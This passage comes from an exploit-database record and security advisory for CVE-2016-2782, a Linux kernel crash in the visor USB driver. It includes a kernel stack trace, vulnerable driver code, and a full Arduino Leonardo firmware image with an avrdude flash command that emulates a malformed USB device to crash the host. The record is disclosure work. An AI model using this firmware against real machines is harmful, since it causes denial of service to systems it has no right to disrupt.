usb_serial_module_init+0x1e/0x1000 [visor]\n[ 35.543244] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230\n[ 35.543244] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40\n[ 35.543244] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0\n[ 35.543244] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150\n[ 35.543244] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0\n[ 35.543244] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b\n[ 35.543244] Code: e1 ba 50 05 00 00 be d0 00 00 00 e8 4a 84 e1 e0 48 85 c0 \n0f 84 e1 02 00 00 48 8b 53 20 48 8b 92 b8 01 00 00 48 89 90 b8 01 00 00 <48> \n89 82 b0 00 00 00 48 8b 53 20 48 8b 92 a8 01 00 00 48 89 90 \n[ 35.543244] RIP [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]\n[ 35.543244] RSP <ffff88000bd23a78>\n[ 35.543244] CR2: 00000000000000b0\n[ 35.973188] ---[ end trace b239663354a1c556 ]---\n[ 35.978862] Kernel panic - not syncing: Fatal exception\n[ 35.979835] drm_kms_helper: panic occurred, switching back to text console\n\nArduino Leonardo Firmware:\n\n:100000000C94A8000C94C5000C94C5000C94C50079\n:100010000C94C5000C94C5000C94C5000C94C5004C\n:100020000C94C5000C94C5000C94C4050C942F04CA\n:100030000C94C5000C94C5000C94C5000C94C5002C\n:100040000C94C5000C94C5000C94C5000C94C5001C\n:100050000C94C5000C94C5000C94C5000C940E02C1\n:100060000C94C5000C94C5000C94C5000C94C500FC\n:100070000C94C5000C94C5000C94C5000C94C500EC\n:100080000C94C5000C94C5000C94C5000C94C500DC\n:100090000C94C5000C94C5000C94C5000C94C500CC\n:1000A0000C94C5000C94C5000C94C5000B030E0302\n:1000B000010305032F032F032F03120316031A0353\n:1000C000200324032F032A030000000200080E006F\n:1000D00000030401000B000000000000000000000D\n:1000E00000000000000004080201104080401020C1\n:1000F00040804080080204018040201002011080EE\n:100100001020404004040404040304050202020217\n:1001100004030202020206060606060604040202A0\n:100120000204000000002300260029002C002F00FC\n:1001300000000000250028002B002E0031000000E8\n:100140000000240027002A002D00300000C180811B\n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077\n:10016000B1E0E4EDF3E102C005900D92A436B107D1\n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C\n:10018000E1F70E94C8000C9404070C940000089545\n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421\n:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B\n:1001B00083E00E94300361E087E00E94300361E049\n:1001C00088E00E9430030E9459067E012AE9E20E6F\n:1001D000F11C84E093E0D70111969C938E9389E003\n:1001E00094E013969C938E93129782E2E2E1F1E001\n:1001F0009E012F5F3F4F6901D90101900D928A95B1\n:10020000E1F788E1E4E3F1E0DE01939601900D92DD\n:100210008A95E1F782E1ECE4F1E0DE01DB96019002\n:100220000D928A95E1F789E0EEE5F1E0DE01A05953\n:10023000BF4F01900D928A95E1F72A593F4F99E0FF\n:10024000992ED901E92D1D92EA95E9F78E010957FA\n:100250001F4F87E0E7E6F1E0D80101900D928A9503\n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189\n:1002700001900D928A95E1F7AE0147585F4F87E0F4\n:10028000E5E7F1E0DA0101900D928A95E1F75E0170\n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D\n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172\n:1002B0001D92EA95E9F7E3E0DC011996EC93D90188\n:1002C0009C92F4E01196FC9311971496EC93F9012B\n:1002D000DC01292D01900D922A95E1F7FE01EC56E3\n:1002E000FF4FDC011B96FC93EE931A971D96BC9270\n:1002F000AE921C971183008373836283558344837A\n:100300000C5211092CE0F80111922A95E9F721E02D\n:10031000D80119962C931997FE01E059FF4F0190CF\n:100320000D929A94E1F7F8019387828761E088E063\n:100330000E9469038BE492E00E94650688E892E0DF\n:100340000E94650687EC92E00E94650686E093E0D5\n:100350000E94650682E493E00E9465068FE793E0C1\n:100360000E94650684EA93E00E9465068BEE93E0A6\n:100370000E94650683E00E949F03892B09F047C015\n:100380005E01F3E2AF0EB11C8824839482E1982EC3\n:1003900084E194E00E946506BF92AF92DF92CF9213\n:1003A000FF92EF921F928F921F930F932DB73EB73C\n:1003B000225131090FB6F8943EBF0FBE2DBFADB725\n:1003C000BEB71196FE01FB96892D01900D928A957C\n:1003D000E1F78DE695E00E94030668E873E180E0AE\n:1003E00090E00E947B028DE695E00E944E0660E060\n:1003F00087E00E94690368E873E180E090E00E9472\n:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E\n:1004100070E080E090E00E947B02ACCF1F920F92D0\n:100420000FB60F9211242F933F938F939F93AF9307\n:10043000BF938091650590916605A0916705B09185\n:1004400068053091640523E0230F2D3720F40196D1\n:10045000A11DB11D05C026E8230F0296A11DB11DE7\n:10046000209364058093650590936605A0936705C6\n:10047000B09368058091690590916A05A0916B051C\n:10048000B0916C050196A11DB11D809369059093F3\n:100490006A05A0936B05B0936C05BF91AF919F91D6\n:1004A0008F913F912F910F900FBE0F901F90189535\n:1004B0003FB7F8948091690590916A05A0916B050A\n:1004C000B0916C0526B5A89B05C02F3F19F0019689\n:1004D000A11DB11D3FBF6627782F892F9A2F620F6C\n:1004E000711D811D911D42E0660F771F881F991FA6\n:1004F0004A95D1F70895CF92DF92EF92FF92CF9372\n:10050000DF936B017C010E945802EB01C114D104FE\n:10051000E104F10479F00E9458026C1B7D0B683EE7\n:100520007340A0F381E0C81AD108E108F108C8516E\n:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029\n:100540000895789484B5826084BD84B5816084BD4B\n:1005500085B5826085BD85B5816085BDEEE6F0E03C\n:10056000808181608083E1E8F0E010828081826098\n:100570008083808181608083E0E8F0E08081816019\n:100580008083E1E9F0E08081826080838081816006\n:100590008083E0E9F0E0808181608083E1ECF0E03D\n:1005A000808184608083808182608083808181609B\n:1005B0008083E3ECF0E0808181608083E0ECF0E018\n:1005C000808182608083E2ECF0E0808181608083C2\n:1005D000EAE7F0E0808184608083808182608083AC\n:1005E000808181608083808180688083089590E02D\n:1005F000FC013197EE30F10590F5EA5AFF4F0C946B\n:10060000AB09809180008F7703C0809180008F7D3F\n:1006100080938000089584B58F7702C084B58F7D64\n:1006200084BD0895809190008F7707C080919000DD\n:100630008F7D03C080919000877F80939000089504\n:100640008091C0008F7703C08091C0008F7D809320\n:10065000C00008958091C200877F8093C2000895F2\n:10066000CF93DF9390E0FC01EA51FF4F2491FC010E\n:10067000EC5FFE4F8491882349F190E0880F991F29\n:10068000FC01E25CFE4FA591B491805D9E4FFC01A0\n:10069000C591D4919FB7611108C0F8948C912095B1\n:1006A00082238C93888182230AC0623051F4F894AB\n:1006B0008C91322F309583238C938881822B888371\n:1006C00004C0F8948C91822B8C939FBFDF91CF91C3\n:1006D00008950F931F93CF93DF931F92CDB7DEB78B\n:1006E000282F30E0F901E853FF4F8491F901EA51D6\n:1006F000FF4F1491F901EC5FFE4F04910023C9F004\n:10070000882321F069830E94F7026981E02FF0E0DD\n:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7\n:100720008C91611103C01095812301C0812B8C93A2\n:100730009FBF0F90DF91CF911F910F910895CF939D\n:10074000DF93282F30E0F901E853FF4F8491F9013E\n:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5\n:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5\n:10077000EE5DFE4FA591B4912C912D2381E090E088\n:1007800021F480E002C080E090E0DF91CF910895F5\n:10079000615030F02091F100FC0120830196F8CFE8\n:1007A000289884E680937D0508951092E9001092C0\n:1007B00071051092700590936F0580936E050895F2\n:1007C000FF920F931F93CF93DF93F82E8B01EA01D3\n:1007D000BA01C8010E94A606F80120E030E08EEFC1\n:1007E0002C173D0791F1F7FE02C0A49101C0A08132\n:1007F000609170057091710540916E0550916F0583\n:1008000064177507ACF49091E8009570E1F390914E\n:10081000E80092FD1CC0A093F100A0917005B0917A\n:1008200071051196AF73BB27AB2B11F48093E800D1\n:10083000A0917005B09171051196B0937105A093C8\n:1008400070052F5F3F4F3196CBCFC90102C08FEFAC\n:100850009FEFDF91CF911F910F91FF9008951F920D\n:100860000F920FB60F9211246F927F928F929F92E8\n:10087000AF92BF92CF92DF92EF92FF920F931F93AE\n:100880002F933F934F935F936F937F938F939F9398\n:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3\n:1008A0006297DEBFCDBF1092E9008091E80083FF20\n:1008B00046C168E0CE010A960E94C80382EF809389\n:1008C000E8009A8597FF05C08091E80080FFFCCF83\n:1008D00003C08EEF8093E800892F807609F023C152\n:1008E0008B85811105C01092F1001092F10020C19A\n:1008F000282F2D7F213009F41BC1853049F48091C8\n:10090000E80080FFFCCF8C8580688093E30010C1F5\n:10091000863009F0E1C02D8508891989223009F057\n:10092000B3C0EC848E2D90E0209173053091740556\n:10093000821793070CF09FC00E94D5031F92EF927D\n:100940008DE394E09F938F930E9483068CE0E89E52\n:1009500070011124E0917505F0917605EE0DFF1DF3\n:1009600089E0DE01119601900D928A95E1F7C801A8\n:100970000E94D50349E050E0BE016F5F7F4F80E0E9\n:100980000E94E0030F900F900F900F90C12CD12C7C\n:10099000612C712C33E7A32E34E0B32E4AEA842E67\n:1009A00044E0942EE0917505F0917605EE0DFF1D63\n:1009B000818590E0681679060CF0BAC07F926F923C\n:1009C000BF92AF920E948306E0917505F091760583\n:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5\n:1009E00080E00E94E0030F900F900F900F9000E0C6\n:1009F00010E0E0917505F0917605EE0DFF1D028483\n:100A0000F385E02DEC0DFD1D818590E00817190799\n:100A10005CF51F930F939F928F920E948306E09143\n:100A20007505F0917605EE0DFF1D0284F385E02D2E\n:100A3000EC0DFD1DC801880F991FA485B585A80F71\n:100A4000B91F4D915C910284F385E02DE80FF91FE9\n:100A50006081718180E00E94E0030F5F1F4F0F9063\n:100A60000F900F900F90C5CF8FEF681A780A8EE025\n:100A7000C80ED11C97CF8FED94E09F938F930E9467\n:100A800083060F900F9058C0C8012A8B0E94D5038F\n:100A90002A892130C1F0233009F04EC08C851F9285\n:100AA0008F9389EF94E09F938F930E94830642E097\n:100AB00050E062E871E080E00E94E0030F900F9048\n:100AC0000F900F9035C04091000150E060E071E060\n:100AD00080E00E94E0032CC0873071F1883021F45F\n:100AE00081E08093F10024C0893011F5937021F5E5\n:100AF000EDE4F1E081E021E096E38093E9002093CA\n:100B0000EB0034913093EC009093ED008F5F3196C1\n:100B1000843099F78EE78093EA001092EA008C8582\n:100B20008093720505C0888999890E94D50304C005\n:100B30008EEF8093E80003C081E28093EB00629621\n:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE\n:100B5000EF91BF91AF919F918F917F916F915F9135\n:100B60004F913F912F911F910F91FF90EF90DF9048\n:100B7000CF90BF90AF909F908F907F906F900F908D\n:100B80000FBE0F901F9018951F920F920FB60F92E5\n:100B900011248F939F938091E1001092E10083FFD5\n:100BA0000FC01092E90091E09093EB001092EC00DE\n:100BB00092E39093ED001092720598E09093F0000C\n:100BC00082FF1AC080917E05882339F080917E05CE\n:100BD000815080937E05882369F080917D0588236C\n:100BE00059F080917D05815080937D05811104C06D\n:100BF000289A02C05D9AF1CF9F918F910F900FBEFE\n:100C00000F901F901895CF93DF93CDB7DEB782E199\n:100C1000FE013596A0E0B1E001900D928A95E1F7D2\n:100C20008F89988D9093760580937505898D9A8D1F\n:100C300090937405809373058B8D9C8D90937C05A8\n:100C400080937B058D8D9E8D90937A058093790599\n:100C50008F8D98A1909378058093770510927205F7\n:100C600081E08093D70080EA8093D80082E189BD3B\n:100C700009B400FEFDCF61E070E080E090E00E94EA\n:100C80007B0280E98093D8008CE08093E200109290\n:100C9000E000559A209ADF91CF91089581E08093EA\n:100CA000E00008959091C80095FFFCCF8093CE009E\n:100CB00008951092CD0087E68093CC0088E1809360\n:100CC000C9008EE08093CA0008950F931F93CF93BD\n:100CD000DF93EC018C01FE0101900020E9F73197D0\n:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E\n:100CF000F80181918F010E945206EDCFDF91CF91D3\n:100D00001F910F910895CF93DF93CDB7DEB7DA959A\n:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6\n:100D2000419151919F0160E071E0CE0101960E94D6\n:100D30000707CE0101960E946506D3950FB6F89479\n:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE\n:100D5000AF92BF92CF92DF92EF92FF920F931F93C9\n:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E\n:100D70003F932F9389839A830E9483068981882ECB\n:100D80009A81992E0F900F9000E010E08EE5E82EEA\n:100D900085E0F82E91E1C92E94E0D92E0A151B05A5\n:100DA000E4F4F40181914F0190E09F938F93FF92BF\n:100DB000EF920E9483060F5F1F4FC8018F70992723\n:100DC0000F900F900F900F90892B41F7DF92CF92E9\n:100DD0000E9483060F900F90E1CF81E194E09F93F2\n:100DE0008F930E9483060F900F900F900F90DF91CA\n:100DF000CF911F910F91FF90EF90DF90CF90BF9018\n:100E0000AF909F908F900895F8940C94E809AEE00D\n:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8\n:100E20004C831A83098377FF02C060E070E8615049\n:100E300071097E836D83A901BC01CE0101960E94D8\n:100E400033074D815E8157FD0AC02F8138854217D7\n:100E500053070CF49A01F801E20FF31F10822E964B\n:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB\n:100E7000B1097C016B018A01FC0117821682838112\n:100E800081FFBDC1CE0101964C01F7019381F601AE\n:100E900093FD859193FF81916F01882309F4ABC184\n:100EA000853239F493FD859193FF81916F018532ED\n:100EB00029F4B70190E00E941B09E7CF512C312C97\n:100EC00020E02032A0F48B3269F030F4803259F007\n:100ED000833269F420612CC08D3239F0803339F4CB\n:100EE000216026C02260246023C0286021C027FD25\n:100EF00027C030ED380F3A3078F426FF06C0FAE00C\n:100F00005F9E300D1124532E13C08AE0389E300DA1\n:100F10001124332E20620CC08E3221F426FD6BC1C9\n:100F2000206406C08C3611F4206802C0883641F473\n:100F3000F60193FD859193FF81916F018111C1CFDE\n:100F4000982F9F7D9554933028F40C5F1F4FFFE33B\n:100F5000F9830DC0833631F0833771F0833509F0A2\n:100F60005BC022C0F801808189830E5F1F4F44243B\n:100F70004394512C540115C03801F2E06F0E711CDE\n:100F8000F801A080B18026FF03C0652D70E002C08B\n:100F90006FEF7FEFC5012C870E9410092C018301A0\n:100FA0002C852F77222E17C03801F2E06F0E711CAE\n:100FB000F801A080B18026FF03C0652D70E002C05B\n:100FC0006FEF7FEFC5012C870E9405092C012C854E\n:100FD0002068222E830123FC1BC0832D90E048163D\n:100FE0005906B0F4B70180E290E00E941B093A94E0\n:100FF000F4CFF50127FC859127FE81915F01B701B0\n:1010000090E00E941B0931103A94F1E04F1A510808\n:101010004114510471F7E5C0843611F0893639F571\n:10102000F80127FF07C060817181828193810C5F85\n:101030001F4F08C060817181882777FD8095982FA8\n:101040000E5F1F4F2F76B22E97FF09C090958095A7\n:10105000709561957F4F8F4F9F4F2068B22E2AE089\n:1010600030E0A4010E944D09A82EA81844C085377D\n:1010700029F42F7EB22E2AE030E025C0F22FF97F2E\n:10108000BF2E8F36C1F018F4883579F0B4C08037A0\n:1010900019F0883721F0AFC02F2F2061B22EB4FE97\n:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D\n:1010B0009660B92E06C028E030E005C020E130E09F\n:1010C00002C020E132E0F801B7FE07C06081718103\n:1010D000828193810C5F1F4F06C06081718180E027\n:1010E00090E00E5F1F4FA4010E944D09A82EA81882\n:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428\n:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0\n:101110007A2C2B2D03C07A2C01C0752C24FF0DC016\n:10112000FE01EA0DF11D8081803311F4297E09C092\n:1011300022FF06C07394739404C0822F867809F04E\n:10114000739423FD13C020FF06C05A2C731418F4A7\n:10115000530C5718732C731468F4B70180E290E0B5\n:101160002C870E941B0973942C85F5CF731410F4FF\n:10117000371801C0312C24FF12C0B70180E390E082\n:101180002C870E941B092C8522FF17C021FF03C05A\n:1011900088E590E002C088E790E0B7010CC0822F9C\n:1011A000867859F021FD02C080E201C08BE227FD64\n:1011B0008DE2B70190E00E941B09A51438F4B70135\n:1011C00080E390E00E941B095A94F7CFAA94F4019F\n:1011D000EA0DF11D8081B70190E00E941B09A1106A\n:1011E000F5CF332009F451CEB70180E290E00E94A0\n:1011F0001B093A94F6CFF7018681978102C08FEFE1\n:101200009FEF2C96E2E10C94CD09FC010590615012\n:1012100070400110D8F7809590958E0F9F1F08950C\n:10122000FC016150704001900110D8F780959095B5\n:101230008E0F9F1F08950F931F93CF93DF93182F47\n:10124000092FEB018B8181FD03C08FEF9FEF20C041\n:1012500082FF10C04E815F812C813D814217530770\n:101260007CF4E881F9819F012F5F3F4F3983288308\n:10127000108306C0E885F985812F0995892B29F708\n:101280002E813F812F5F3F4F3F832E83812F902FF1\n:10129000DF91CF911F910F910895FA01AA2728306D\n:1012A00051F1203181F1E8946F936E7F6E5F7F4F33\n:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF\n:1012C000781F891F9A1FA11D680F791F8A1F911D02\n:1012D000A11D6A0F711D811D911DA11D20D009F452\n:1012E00068943F912AE0269F11243019305D319394\n:1012F000DEF6CF010895462F4770405D4193B3E07D\n:101300000FD0C9F7F6CF462F4F70405D4A3318F023\n:10131000495D31FD4052419302D0A9F7EACFB4E0D4\n:10132000A6959795879577956795BA95C9F700978C\n:101330006105710508959B01AC010A2E069457952D\n:10134000479537952795BA95C9F7620F731F841F84\n:10135000951FA01D0895EE0FFF1F0590F491E02D3D\n:1013600009942F923F924F925F926F927F928F9249\n:101370009F92AF92BF92CF92DF92EF92FF920F9324\n:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E\n:10139000F894DEBF0FBECDBF09942A8839884888EB\n:1013A0005F846E847D848C849B84AA84B984C88481\n:1013B000DF80EE80FD800C811B81AA81B981CE0F78\n:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D\n:0413D000F894FFCFBF\n:1013D4001201000200000040AD0BEFBE000101024B\n:1013E4000001220342006100640020004200410029\n:1013F40042004500250078002500780025006E0095\n:1014040025007000180342004100440020004300FE\n:10141400300046004600450045002100120100024C\n:10142400000000402D08000200010102030109022E\n:10143400270001010000FA0705810304040C0705D5\n:10144400010204000C0705820104000C07000700D8\n:101454000700480100500072006F006C00690066CC\n:101464000069006300000A550000006BFD180A00C3\n:10147400809F0AB901312B940A8101128946001315\n:10148400000257028B0A5E0AF80A5F01F212010099\n:1014940002010000400D055702000101020301B9D9\n:1014A4000A0100F80A5F0A810A220342006100640B\n:1014B400002000420041004200450025007800253C\n:1014C40000780025006E00250070001803420041DA\n:1014D400004400200043003000460046004500451B\n:1014E40000210012010002010000400D0557020016\n:1014F400010102030109040000030100000003F2DA\n:101504000AEC0A0902270001010000FA01AB0A09EA\n:101514000400000301000000090200202020202014\n:101524005F5F5F5F5F5F5F5F2020202020202020BF\n:1015340020202020202020202020202020202020A7\n:1015440020205F5F5F5F5F205F5F20205F2020209F\n:101554002020205F5F0A0D00202020202F205F5FC5\n:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3\n:101574005F5F20205F5F5F5F5F20202020202F209F\n:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3\n:10159400202F5F5F0A0D002020202F202F202020E5\n:1015A4002F205F5F205C2F205F5F20602F205F5F14\n:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A\n:1015C400205C2F205F5F2F202F205F5F5F2F202F55\n:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009\n:1015E4002F202F202F202F5F2F202F202F5F2F2001\n:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0\n:101604002F202F5F2F202F202F5F5F2F202C3C0AAD\n:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07\n:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F\n:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4\n:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044\n:101654003C3C2043485241534820414E59204F506E\n:1016640045524154494E472053595354454D203E09\n:101674003E0A0D00203C3C202863292053657267F4\n:10168400656A20536368756D696C6F20323031353B\n:101694002C204F70656E536F7572636520536563BC\n:1016A40075726974792052616C66205370656E6E30\n:1016B4006562657267203E3E0A0D000A3E3E205078\n:1016C4007265737320627574746F6E20746F207307\n:1016D4007461727420657865637574696F6E2E2EFB\n:1016E4002E0A0D005B44454255475D2045786563ED\n:1016F400757465207061796C6F616420300A0D0027\n:10170400526563762D446174613A0A0D005B444569\n:101714004255475D200953656E6420436F6E6669C8\n:101724006775726174696F6E44657363726970740E\n:101734006F720928696E6465783A2569292E2E2E00\n:101744000D0A005B44454255475D200953656E64AC\n:1017540020496E74657266616365204465736372C3\n:101764006970746F720928696E7465726661636565\n:101774003A2569292E2E2E0D0A005B444542554711\n:101784005D200953656E6420456E64706F696E74E4\n:101794002044657363726970746F720928656E649E\n:1017A400706F696E743A2569292E2E2E0D0A005B1E\n:1017B40044454255475D203C3C70616E6963206D31\n:1017C4006F64653F3E3E0D0A005B44454255475DEC\n:1017D4002009203E3E20537472696E67204465736D\n:1017E40063726970746F72207265717565737420A9\n:1017F4002D2073656E64696E67206D616C666F720F\n:101804006D656420737472696E67212073657475E5\n:10181400702E7756616C75654C203D3D2025690D11\n:101824000A005B48455844554D505D0A0D0025306B\n:041834003258200006\n:00000001FF", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitdb": [{"lastseen": "2023-11-27T17:18:42", "description": "", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-09T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor 'treo_attach' Nullpointer Dereference", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["2016-2782", "CVE-2016-2782"], "modified": "2016-03-09T00:00:00", "id": "EDB-ID:39539", "href": "https://www.exploit-db.com/exploits/39539", "sourceData": "OS-S Security Advisory 2016-10\r\nLinux visor (treo_attach) Nullpointer Dereference\r\n\r\nDate: March 4th, 2016\r\nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg\r\nCVE: CVE-2016-2782\r\nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)\r\nTitle: Local RedHat Enterprise Linux DoS \u00e2?? RHEL 7.1 Kernel crashes on invalid \r\nUSB device descriptors (visor treo_attach driver)\r\nSeverity: Critical. The Kernel panics. A reboot is required.\r\nEase of Exploitation: Trivial\r\nVulnerability type: Wrong input validation\r\nProducts: RHEL 7.1 including all updates\r\nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \r\nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)\r\nVendor: Red Hat\r\nVendor contacted: November, 12th 2015\r\nPDF of advisory: https://os-s.net/advisories/OSS-2016-10_visor_treo_attach.pdf\r\n\r\nAbstract:\r\nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB \r\ndevice requiring the visor (treo_attach) driver.\r\n\r\nDetailed product description:\r\nWe confirmed the bug on the following system:\r\nRHEL 7.1\r\nKernel 3.10.0-229.20.1.el7.x86_64\r\nFurther products or kernel versions have not been tested.\r\nHow reproducible: Always\r\nActual results: Kernel crashes.\r\n\r\nDescription:\r\nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \r\n(github.com/schumilo) using the following device descriptor:\r\n\r\n[*] Device-Descriptor\r\nbLength:\t0x12\r\nbDescriptorType:\t0x1\r\nbcdUSB:\t0x200\r\nbDeviceClass:\t0x3\r\nbDeviceSubClass:\t0x0\r\nbDeviceProtocol:\t0x0\r\nbMaxPacketSize:\t0x40\r\nidVendor:\t0x82d\r\nidProduct:\t0x200\r\nbcdDevice:\t0x100\r\niManufacturer:\t0x1\r\niProduct:\t0x2\r\niSerialNumbers:\t0x3\r\nbNumConfigurations:\t0x1\r\n\r\nThe treo_attach function does not use the num_ports (struct usb_serial) value \r\nfor any kind of sanity checks during the initialization process. Due to an \r\nincomplete sanity check, the driver could try to dereference a null-pointer if \r\na malformed device-descriptor is presented (zero-value for bNumEndpoints or no \r\nrequired endpoint-descriptors is provided).\r\nThis results in a crash of the system.\r\n\r\n****\r\n...\r\n554 #define COPY_PORT(dest, src) 555 do { 556 int i; 557 558 for (i = 0; i < ARRAY_SIZE(src->read_urbs); ++i) { 559 dest->read_urbs[i] = src->read_urbs[i]; \\ /* Possible \r\nNullpointer-Dereference */\r\n560 dest->read_urbs[i]->context = dest; 561 dest->bulk_in_buffers[i] = src->bulk_in_buffers[i]; 562 } 563 dest->read_urb = src->read_urb; 564 dest->bulk_in_endpointAddress = src->bulk_in_endpointAddress;565 dest->bulk_in_buffer = src->bulk_in_buffer; 566 dest->bulk_in_size = src->bulk_in_size; 567 dest->interrupt_in_urb = src->interrupt_in_urb; 568 dest->interrupt_in_urb->context = dest; 569 dest->interrupt_in_endpointAddress = 570 src->interrupt_in_endpointAddress;571 dest->interrupt_in_buffer = src->interrupt_in_buffer; 572 } while (0);\r\n573\r\n574 swap_port = kmalloc(sizeof(*swap_port), GFP_KERNEL);\r\n575 if (!swap_port)\r\n576 return -ENOMEM;\r\n577 COPY_PORT(swap_port, serial->port[0]); /* no sanity-check! */\r\n578 COPY_PORT(serial->port[0], serial->port[1]); /* no sanity-check! */\r\n579 COPY_PORT(serial->port[1], swap_port); /* no sanity-check! */\r\n...\r\n****\r\n\r\n[*] Configuration-Descriptor\r\nbLength:\t0x9\r\nbDescriptorType:\t0x2\r\nwTotalLength:\t0x27\r\nbNumInterfaces:\t0x1\r\nbConfigurationValue:\t0x1\r\niConfiguration:\t0x0\r\nbmAttributes:\t0x0\r\nbMaxPower:\t0x31\r\n[*] Interface-Descriptor\r\nbLength:\t0x9\r\nbDescriptorType:\t0x4\r\nbInterfaceNumber:\t0x0\r\nbAlternateSetting:\t0x0\r\nbNumEndpoints:\t0x3\r\nbInterfaceClass:\t0x0\r\nbInterfaceSubClass:\t0x0\r\nbInterfaceProtocol:\t0x0\r\n[*] Endpoint-Descriptor:\r\nbLength:\t0x7\r\nbDescriptorType:\t0x5\r\nbEndpointAddress:\t0x81\t\r\nbmAttribut:\t0x3\t\r\nwMaxPacketSize:\t0x404\r\nbInterval:\t0xc\r\n[*] Endpoint-Descriptor:\r\nbLength:\t0x7\r\nbDescriptorType:\t0x5\r\nbEndpointAddress:\t0x1\t\r\nbmAttribut:\t0x2\t\r\nwMaxPacketSize:\t0x4\r\nbInterval:\t0xc\r\n[*] Endpoint-Descriptor:\r\nbLength:\t0x7\r\nbDescriptorType:\t0x5\r\nbEndpointAddress:\t0x82\t\r\nbmAttribut:\t0x1\r\nwMaxPacketSize:\t0x4\r\nbInterval:\t0xc\r\n\r\nProof of Concept:\r\nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \r\nfirmware will emulate the defective USB device.\r\n\r\navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \r\nflash:w:binary.hex\r\n\r\nThe firmware has been attached to this bug report.\r\nTo prevent the automated delivery of the payload, a jumper may be used to \r\nconnect port D3 and 3V3!\r\n\r\nSeverity and Ease of Exploitation:\r\nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \r\nonly physical access to the system is required.\r\n\r\nVendor Communication:\r\nWe contacted Red Hat on the November, 12th 2015.\r\nThis bug was fixed upstream. A CVE number was not assigned.\r\n\r\nReferences:\r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283374\r\nhttp://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i\r\nd=cac9b50b0d75a1d50d6c056ff65c005f3224c8e0\r\n\r\nKernel Stacktrace:\r\n\r\n[ 35.176832] usb 1-1: new full-speed USB device number 2 using xhci_hcd\r\n[ 35.400183] usb 1-1: New USB device found, idVendor=082d, idProduct=0200\r\n[ 35.407780] usb 1-1: New USB device strings: Mfr=1, Product=2, \r\nSerialNumber=3\r\n[ 35.417186] usb 1-1: Product: \u00c4?\r\n[ 35.421846] usb 1-1: Manufacturer: \u00c4?\r\n[ 35.425686] usb 1-1: SerialNumber: %\r\n[ 35.438608] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc \r\nsays 96 microframes\r\n[ 35.493316] usbcore: registered new interface driver visor\r\n[ 35.503150] usbserial: USB Serial support registered for Handspring Visor / \r\nPalm OS\r\n[ 35.512980] usbserial: USB Serial 